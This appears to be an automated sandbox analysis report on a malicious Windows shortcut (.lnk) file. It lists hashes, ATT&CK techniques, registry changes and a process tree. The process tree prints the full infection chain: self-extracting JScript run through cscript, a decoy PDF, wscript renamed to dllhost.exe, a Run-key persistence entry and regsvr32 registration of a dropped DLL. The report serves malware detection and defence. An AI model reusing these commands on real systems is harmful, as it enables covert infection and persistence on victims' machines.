a05d6e6dec8f17a057c808de2a6b76360563e7f0c37ad9be8ff706510b1cf9fa

Analysis

max time kernel
191s
max time network
216s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
18/11/2023, 02:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
Size

345KB
MD5

ba26b003f8f8b00da1bb1e4c12d109cc
SHA1

a88b3cc71121c9b96053049892abb98b4db3eedc
SHA256

c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a
SHA512

580de04b864c1dca99635d96344a8e866353633c40d27c366d7d9bb6797ec43106044a071c86338457b3f935ab7f7294b72b2d165b45392bb28f1dda0db9ed48
SSDEEP

6144:ydr8fmEOmqG2K13qPIWAiC/Q5FNTrmwMtGQqOh5PAW7LebJcDgym8/kU0:0QDOmqzHPZAilTiwMtfh5P1Lo4kB

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1044	dllhost.exe

Loads dropped DLL 2 IoCs

pid	Process
2864	regsvr32.exe
1044	dllhost.exe

Registers COM server for autorun 1 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\libeay32.dll"	regsvr32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Run\CTFM0N.EXE = "cmd /c start C:\\Users\\Admin\\AppData\\Local\\Temp\\dllhost.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\~26210619.js"	cscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\DynamicWrapperX	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\libeay32.dll"	regsvr32.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
1044	dllhost.exe
928	AcroRd32.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1044	dllhost.exe
928	AcroRd32.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
928	AcroRd32.exe
928	AcroRd32.exe
928	AcroRd32.exe
928	AcroRd32.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 2600 wrote to memory of 1588	2600	cmd.exe	30
PID 2600 wrote to memory of 1588	2600	cmd.exe	30
PID 2600 wrote to memory of 1588	2600	cmd.exe	30
PID 1588 wrote to memory of 2608	1588	cmd.exe	31
PID 1588 wrote to memory of 2608	1588	cmd.exe	31
PID 1588 wrote to memory of 2608	1588	cmd.exe	31
PID 1588 wrote to memory of 2684	1588	cmd.exe	32
PID 1588 wrote to memory of 2684	1588	cmd.exe	32
PID 1588 wrote to memory of 2684	1588	cmd.exe	32
PID 1588 wrote to memory of 2492	1588	cmd.exe	33
PID 1588 wrote to memory of 2492	1588	cmd.exe	33
PID 1588 wrote to memory of 2492	1588	cmd.exe	33
PID 2492 wrote to memory of 1412	2492	cscript.exe	34
PID 2492 wrote to memory of 1412	2492	cscript.exe	34
PID 2492 wrote to memory of 1412	2492	cscript.exe	34
PID 2492 wrote to memory of 2180	2492	cscript.exe	36
PID 2492 wrote to memory of 2180	2492	cscript.exe	36
PID 2492 wrote to memory of 2180	2492	cscript.exe	36
PID 2492 wrote to memory of 2824	2492	cscript.exe	38
PID 2492 wrote to memory of 2824	2492	cscript.exe	38
PID 2492 wrote to memory of 2824	2492	cscript.exe	38
PID 2824 wrote to memory of 1044	2824	cmd.exe	40
PID 2824 wrote to memory of 1044	2824	cmd.exe	40
PID 2824 wrote to memory of 1044	2824	cmd.exe	40
PID 2824 wrote to memory of 1044	2824	cmd.exe	40
PID 1412 wrote to memory of 928	1412	cmd.exe	41
PID 1412 wrote to memory of 928	1412	cmd.exe	41
PID 1412 wrote to memory of 928	1412	cmd.exe	41
PID 1412 wrote to memory of 928	1412	cmd.exe	41
PID 1044 wrote to memory of 916	1044	dllhost.exe	42
PID 1044 wrote to memory of 916	1044	dllhost.exe	42
PID 1044 wrote to memory of 916	1044	dllhost.exe	42
PID 1044 wrote to memory of 916	1044	dllhost.exe	42
PID 916 wrote to memory of 2864	916	cmd.exe	44
PID 916 wrote to memory of 2864	916	cmd.exe	44
PID 916 wrote to memory of 2864	916	cmd.exe	44
PID 916 wrote to memory of 2864	916	cmd.exe	44
PID 916 wrote to memory of 2864	916	cmd.exe	44
PID 916 wrote to memory of 2864	916	cmd.exe	44
PID 916 wrote to memory of 2864	916	cmd.exe	44

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2600
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c DIR 000792244100393251090026219142\00157269330078632939 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk') do (if %~za gtr 79002 (findstr /b "var onm=" "%a" > C:\Users\Admin\AppData\Local\Temp\~26210619.js & cscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 9))&cls&exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk
    3⤵
    PID:2608
- - C:\Windows\system32\findstr.exe
    findstr /b "var onm=" "C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk"
    3⤵
    PID:2684
- - C:\Windows\system32\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 9
    3⤵
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1412
    - - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf"
        5⤵
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:928
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\wscript.exe C:\Users\Admin\AppData\Local\Temp\dllhost.exe /y
      4⤵
      PID:2180
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2824
    - - C:\Users\Admin\AppData\Local\Temp\dllhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of WriteProcessMemory
        
        PID:1044
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:916
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        C:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf

Filesize
128KB

MD5
c585f511f7edb1219e8f891de560614d

SHA1
7c7b4ac5f2fe5e3f2138a3945613f7823a00f9be

SHA256
831d48b6ab77f6ece7b9549d1dfb6ccf87ff9b230d39c087637288520e4fd83b

SHA512
e588162ce74b10880a18a4501a9ebe1f723cf5cbd7949f9d79db93b0625ffb7a5d72287db0a403b12c9bf69480ba9e74b55fe1c136765098a2826c4d7140ae64

Download Submit
C:\Users\Admin\AppData\Local\Temp\dllhost.exe

Filesize
138KB

MD5
d1ab72db2bedd2f255d35da3da0d4b16

SHA1
860265276b29b42b8c4b077e5c651def9c81b6e9

SHA256
047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0

SHA512
b46830742eebc85e731c14f7dc72cc6734fcc79aab46f6080c95589c438c4cca0a069027badc0a8a78e4deeb31cdf38df3d63db679b793212a32efdad7bb8185

Download Submit
C:\Users\Admin\AppData\Local\Temp\dllhost.exe

Filesize
138KB

MD5
d1ab72db2bedd2f255d35da3da0d4b16

SHA1
860265276b29b42b8c4b077e5c651def9c81b6e9

SHA256
047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0

SHA512
b46830742eebc85e731c14f7dc72cc6734fcc79aab46f6080c95589c438c4cca0a069027badc0a8a78e4deeb31cdf38df3d63db679b793212a32efdad7bb8185

Download Submit
C:\Users\Admin\AppData\Local\Temp\libeay32.dll

Filesize
13KB

MD5
e0b8dfd17b8e7de760b273d18e58b142

SHA1
801509fb6783c9e57edc67a72dde3c62080ffbaf

SHA256
4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

SHA512
443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~26210619.js

Filesize
343KB

MD5
a585372367e029c2d987d6c6845f56e6

SHA1
abedec3a0071e0df708f011b8e830017460f73bb

SHA256
336262cb2d07a9cc6d844a5fbe7c2c85db5ff7d6d05d2f44c029f5baf29b9935

SHA512
f0496c5020438d3b1d93bb61fb322ab7677b706f8e472e8f82524f8d43d87ae830d72357a5ba93ed26897b3f0dd9a28d134221b19b9c2063ed362a5f7c22ba4d

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
28062c7f330be3fe2fae998b2b295a8c

SHA1
52ab4e915dc2572fea5d61b6e9150b5143a61c46

SHA256
7ff10efff32397f8ff673ed8f24bb84ee1f6870a9fb49e9863294246425ccf91

SHA512
0413bef499b73193ed2d1f442edf06951bd6f64c256ac79b756e3201b6060c4a8998b34a3bceb6b1721106503022cde4eae0202a9943eec62e6ecf28bff69cd3

Download Submit
\Users\Admin\AppData\Local\Temp\libeay32.dll

Filesize
13KB

MD5
e0b8dfd17b8e7de760b273d18e58b142

SHA1
801509fb6783c9e57edc67a72dde3c62080ffbaf

SHA256
4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

SHA512
443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

Download Submit
\Users\Admin\AppData\Local\Temp\libeay32.dll

Filesize
13KB

MD5
e0b8dfd17b8e7de760b273d18e58b142

SHA1
801509fb6783c9e57edc67a72dde3c62080ffbaf

SHA256
4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

SHA512
443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

Download Submit
memory/1044-93-0x00000000004B0000-0x00000000004C2000-memory.dmp

Filesize
72KB

Download
memory/1044-94-0x0000000000490000-0x0000000000499000-memory.dmp

Filesize
36KB

Download
memory/1044-92-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/1044-84-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/1044-96-0x00000000004B0000-0x00000000004C2000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads